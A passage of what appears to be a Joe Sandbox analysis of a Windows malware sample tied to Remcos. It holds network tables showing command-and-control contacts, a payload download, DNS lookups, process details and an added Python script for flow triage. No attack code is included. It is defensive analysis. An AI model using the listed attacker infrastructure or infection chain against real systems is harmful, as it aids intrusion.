Oct 6, 2024 11:47:04.802917004 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.803116083 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.803148985 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.803282022 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.803299904 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.803459883 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.803482056 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.803540945 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.803747892 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.803909063 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.803946018 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.804061890 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.804307938 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.804322958 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.804554939 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.843939066 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.843978882 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.844090939 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.844285965 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:04.844301939 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:04.844610929 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.002325058 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.002365112 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.002563000 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.002583981 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.002626896 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.002743959 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.002844095 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.002882957 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.002952099 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.003000021 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.003101110 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.003113031 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.003243923 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.003735065 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.003762007 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.003962040 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.004059076 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.004188061 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.004199982 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.004504919 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.004535913 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.004642010 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.004658937 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.004877090 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.004959106 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.004986048 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.005085945 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.005161047 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.005176067 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.005278111 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.005403996 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.005434990 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.005474091 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.005486012 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.005569935 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.005569935 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.005667925 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.005733967 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.005759954 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.005789042 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.005942106 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006031990 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006045103 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.006153107 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.006186008 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.006227970 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006242037 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.006304979 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006396055 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006505013 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.006530046 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.006551981 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006565094 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.006629944 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006629944 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006726980 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006726980 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006776094 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.006882906 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.006915092 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.007020950 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.007241011 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.007253885 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.007388115 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.007412910 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.007422924 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.007436991 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.007591963 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.007657051 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.047252893 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.047283888 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.047388077 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.047489882 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.047502041 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.047586918 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.047736883 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.087357998 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.087428093 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.087564945 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.087728024 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.087771893 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.087910891 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.205553055 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.205673933 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.205785036 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.205785036 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.205950022 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.205950022 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.205950022 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.206037998 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.206250906 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.206605911 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.206692934 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.206867933 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.206939936 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.206964970 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.207212925 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.207740068 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.207827091 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.207938910 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.207940102 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.207940102 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.208015919 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.208054066 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.208172083 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.208239079 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.208784103 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.208802938 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.208939075 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.209076881 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.209084988 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.209103107 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.209117889 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.209135056 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.209275007 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.209275007 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.209424973 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.209444046 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.209613085 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.210342884 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.210364103 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.210516930 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.210516930 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.210545063 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.210561991 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.210654974 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.210728884 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.210740089 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.210843086 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.210908890 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.210908890 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:05.210938931 CEST | 443 | 49768 | 85.120.16.93 | 192.168.11.20 |
Oct 6, 2024 11:47:05.211169958 CEST | 49768 | 443 | 192.168.11.20 | 85.120.16.93 |
Oct 6, 2024 11:47:10.254287958 CEST | 49769 | 3980 | 192.168.11.20 | 192.169.69.26 |
Oct 6, 2024 11:47:10.533413887 CEST | 3980 | 49769 | 192.169.69.26 | 192.168.11.20 |
Oct 6, 2024 11:47:10.533767939 CEST | 49769 | 3980 | 192.168.11.20 | 192.169.69.26 |
Oct 6, 2024 11:47:10.534594059 CEST | 49769 | 3980 | 192.168.11.20 | 192.169.69.26 |
Oct 6, 2024 11:47:10.745951891 CEST | 3980 | 49769 | 192.169.69.26 | 192.168.11.20 |
Oct 6, 2024 11:47:10.858428001 CEST | 49770 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:11.871938944 CEST | 49770 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:13.887119055 CEST | 49770 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:17.901822090 CEST | 49770 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:25.915685892 CEST | 49770 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:33.058794975 CEST | 49773 | 3980 | 192.168.11.20 | 192.169.69.26 |
Oct 6, 2024 11:47:33.264039993 CEST | 3980 | 49773 | 192.169.69.26 | 192.168.11.20 |
Oct 6, 2024 11:47:33.264236927 CEST | 49773 | 3980 | 192.168.11.20 | 192.169.69.26 |
Oct 6, 2024 11:47:33.265039921 CEST | 49773 | 3980 | 192.168.11.20 | 192.169.69.26 |
Oct 6, 2024 11:47:33.471057892 CEST | 3980 | 49773 | 192.169.69.26 | 192.168.11.20 |
Oct 6, 2024 11:47:33.472913980 CEST | 49774 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:34.476418972 CEST | 49774 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:36.491615057 CEST | 49774 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:40.506438017 CEST | 49774 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:48.520194054 CEST | 49774 | 3981 | 192.168.11.20 | 45.74.58.7 |
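The packet table shows two distinct outcomes on the non-TLS ports. Towards 192.169.69.26:3980 the exchange is bidirectional (the server answers within about 280 ms and the IDS rows above tag the client's first data packet as a Remcos check-in). Towards 45.74.58.7:3981 only client-side packets appear, spaced about 1, 2, 4 and 8 seconds apart: the table does not show TCP flags, but that doubling is the exponential back-off a retransmission timer uses (RFC 6298), so the host was down or filtered and the client gave up after the retry budget, then repeated the whole sequence twenty seconds later from a new source port. The following is an added example, not part of the Joe Sandbox report, that turns rows in this table's format into per-endpoint verdicts. The ten rows embedded in it are copied from the table above (the long 443 exchange is left out for brevity but parses the same way); the `syn-backoff` label is an inference from timing, as explained, not something the report states.

```python
"""Flow triage over rows in the report's TCP packet-table format.

Added example, not part of the Joe Sandbox report. The sample rows are
copied from the report's TCP table. The logic is generic: per server
endpoint it asks whether the server ever sent anything and, if not,
whether the client's packet spacing doubles the way a SYN retransmission
timer does.
"""
import re
from dataclasses import dataclass, field
from datetime import datetime, timezone

# Rows copied from the report's TCP table (check-in to :3980, unanswered attempts to :3981).
SAMPLE_TCP_TABLE = """
Timestamp | Source Port | Dest Port | Source IP | Dest IP
---|---|---|---|---|
Oct 6, 2024 11:47:10.254287958 CEST | 49769 | 3980 | 192.168.11.20 | 192.169.69.26 |
Oct 6, 2024 11:47:10.533413887 CEST | 3980 | 49769 | 192.169.69.26 | 192.168.11.20 |
Oct 6, 2024 11:47:10.533767939 CEST | 49769 | 3980 | 192.168.11.20 | 192.169.69.26 |
Oct 6, 2024 11:47:10.534594059 CEST | 49769 | 3980 | 192.168.11.20 | 192.169.69.26 |
Oct 6, 2024 11:47:10.745951891 CEST | 3980 | 49769 | 192.169.69.26 | 192.168.11.20 |
Oct 6, 2024 11:47:10.858428001 CEST | 49770 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:11.871938944 CEST | 49770 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:13.887119055 CEST | 49770 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:17.901822090 CEST | 49770 | 3981 | 192.168.11.20 | 45.74.58.7 |
Oct 6, 2024 11:47:25.915685892 CEST | 49770 | 3981 | 192.168.11.20 | 45.74.58.7 |
"""

TS_RE = re.compile(r"^(?P<date>[A-Za-z]{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) (?P<tz>\w+)$")


def parse_timestamp(text: str) -> float:
    """Seconds as a float with nanosecond fraction. The zone label is ignored: only
    differences within one capture are used, so a constant offset does not matter."""
    m = TS_RE.match(text.strip())
    if m is None:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    base = datetime.strptime(m.group("date"), "%b %d, %Y %H:%M:%S").replace(tzinfo=timezone.utc)
    nanos = int(m.group("frac").ljust(9, "0")[:9])
    return base.timestamp() + nanos / 1e9


@dataclass
class Flow:
    client: tuple
    server: tuple
    out_times: list = field(default_factory=list)  # client -> server packets
    in_times: list = field(default_factory=list)   # server -> client packets


def parse_packets(table_text: str):
    """Yield (timestamp, (src_ip, src_port), (dst_ip, dst_port)) from rows in the report's format."""
    for line in table_text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) < 5 or cells[0] == "Timestamp" or cells[0].startswith("---"):
            continue  # header and separator rows
        ts, sport, dport, sip, dip = cells[:5]
        yield parse_timestamp(ts), (sip, int(sport)), (dip, int(dport))


def build_flows(packets):
    """Group packets by endpoint pair; the first packet seen decides which side is the client."""
    flows = {}
    for ts, src, dst in packets:
        key = frozenset((src, dst))
        flow = flows.get(key)
        if flow is None:
            flow = flows[key] = Flow(client=src, server=dst)
        (flow.out_times if src == flow.client else flow.in_times).append(ts)
    return list(flows.values())


def gaps(flow: Flow):
    """Seconds between consecutive client-side packets."""
    return [b - a for a, b in zip(flow.out_times, flow.out_times[1:])]


def classify(flow: Flow, min_retries: int = 3, tolerance: float = 0.25) -> str:
    """'answered' if the server sent anything; 'syn-backoff' if only the client transmitted
    and each gap is roughly double the previous one (retransmission timer, host down or
    filtered); otherwise 'unanswered'."""
    if flow.in_times:
        return "answered"
    g = gaps(flow)
    doubling = all(a > 0 and abs(b / a - 2.0) <= tolerance for a, b in zip(g, g[1:]))
    return "syn-backoff" if len(g) >= min_retries and doubling else "unanswered"


def summarize(table_text: str) -> dict:
    """Map 'server_ip:port' to its verdict for every flow in the table."""
    return {f"{f.server[0]}:{f.server[1]}": classify(f)
            for f in build_flows(parse_packets(table_text))}


if __name__ == "__main__":
    for endpoint, verdict in summarize(SAMPLE_TCP_TABLE).items():
        print(f"{endpoint:22s} {verdict}")
```

For the rows above this reports 192.169.69.26:3980 as answered and 45.74.58.7:3981 as syn-backoff. The distinction matters for response: the answered endpoint is live infrastructure and belongs on the block list, while the unanswered one is configured in the sample (it was resolved via DNS just before the first attempt) and is still worth blocking, but a retrospective search for connections to it will find nothing because no session was ever established.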
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 6, 2024 11:47:02.905457973 CEST | 57277 | 53 | 192.168.11.20 | 1.1.1.1 |
Oct 6, 2024 11:47:03.312587023 CEST | 53 | 57277 | 1.1.1.1 | 192.168.11.20 |
Oct 6, 2024 11:47:10.142237902 CEST | 59893 | 53 | 192.168.11.20 | 1.1.1.1 |
Oct 6, 2024 11:47:10.252559900 CEST | 53 | 59893 | 1.1.1.1 | 192.168.11.20 |
Oct 6, 2024 11:47:10.747122049 CEST | 54980 | 53 | 192.168.11.20 | 1.1.1.1 |
Oct 6, 2024 11:47:10.856147051 CEST | 53 | 54980 | 1.1.1.1 | 192.168.11.20 |
Oct 6, 2024 11:47:31.934254885 CEST | 55610 | 53 | 192.168.11.20 | 1.1.1.1 |
Oct 6, 2024 11:47:32.045561075 CEST | 53 | 55610 | 1.1.1.1 | 192.168.11.20 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Oct 6, 2024 11:47:02.905457973 CEST | 192.168.11.20 | 1.1.1.1 | 0xe710 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Oct 6, 2024 11:47:10.142237902 CEST | 192.168.11.20 | 1.1.1.1 | 0xcfa1 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Oct 6, 2024 11:47:10.747122049 CEST | 192.168.11.20 | 1.1.1.1 | 0x76dc | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Oct 6, 2024 11:47:31.934254885 CEST | 192.168.11.20 | 1.1.1.1 | 0x3008 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Oct 6, 2024 11:47:03.312587023 CEST | 1.1.1.1 | 192.168.11.20 | 0xe710 | No error (0) | | | 85.120.16.93 | A (IP address) | IN (0x0001) | false |
Oct 6, 2024 11:47:10.252559900 CEST | 1.1.1.1 | 192.168.11.20 | 0xcfa1 | No error (0) | | | 192.169.69.26 | A (IP address) | IN (0x0001) | false |
Oct 6, 2024 11:47:10.856147051 CEST | 1.1.1.1 | 192.168.11.20 | 0x76dc | No error (0) | | | 45.74.58.7 | A (IP address) | IN (0x0001) | false |
Oct 6, 2024 11:47:32.045561075 CEST | 1.1.1.1 | 192.168.11.20 | 0x3008 | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.11.20 | 49768 | 85.120.16.93 | 443 | 1264 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-06 09:47:03 UTC | 189 | OUT | |
2024-10-06 09:47:04 UTC | 499 | IN | |
2024-10-06 09:47:04 UTC | 869 | IN | |
2024-10-06 09:47:04 UTC | 14994 | IN | |
2024-10-06 09:47:04 UTC | 16384 | IN | |
2024-10-06 09:47:04 UTC | 16384 | IN | |
2024-10-06 09:47:04 UTC | 16384 | IN | |
2024-10-06 09:47:04 UTC | 16384 | IN | |
2024-10-06 09:47:04 UTC | 16384 | IN | |
2024-10-06 09:47:04 UTC | 16384 | IN | |
2024-10-06 09:47:04 UTC | 16384 | IN | |
2024-10-06 09:47:04 UTC | 521 | IN |
Target ID: | 0 |
Start time: | 05:46:28 |
Start date: | 06/10/2024 |
Path: | C:\Users\user\Desktop\zR4aIjCuRs.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 776'478 bytes |
MD5 hash: | 02F086FB54D58BF17B51564B34166F5E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 2 |
Start time: | 05:46:29 |
Start date: | 06/10/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x860000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 05:46:29 |
Start date: | 06/10/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7ab9d0000 |
File size: | 875'008 bytes |
MD5 hash: | 81CA40085FC75BABD2C91D18AA9FFA68 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 05:46:54 |
Start date: | 06/10/2024 |
Path: | C:\Windows\SysWOW64\msiexec.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 59'904 bytes |
MD5 hash: | 9D09DC1EDA745A5F87553048E57620CF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 05:46:54 |
Start date: | 06/10/2024 |
Path: | C:\Windows\SysWOW64\msiexec.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 59'904 bytes |
MD5 hash: | 9D09DC1EDA745A5F87553048E57620CF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 05:46:54 |
Start date: | 06/10/2024 |
Path: | C:\Windows\SysWOW64\msiexec.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 59'904 bytes |
MD5 hash: | 9D09DC1EDA745A5F87553048E57620CF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 05:47:01 |
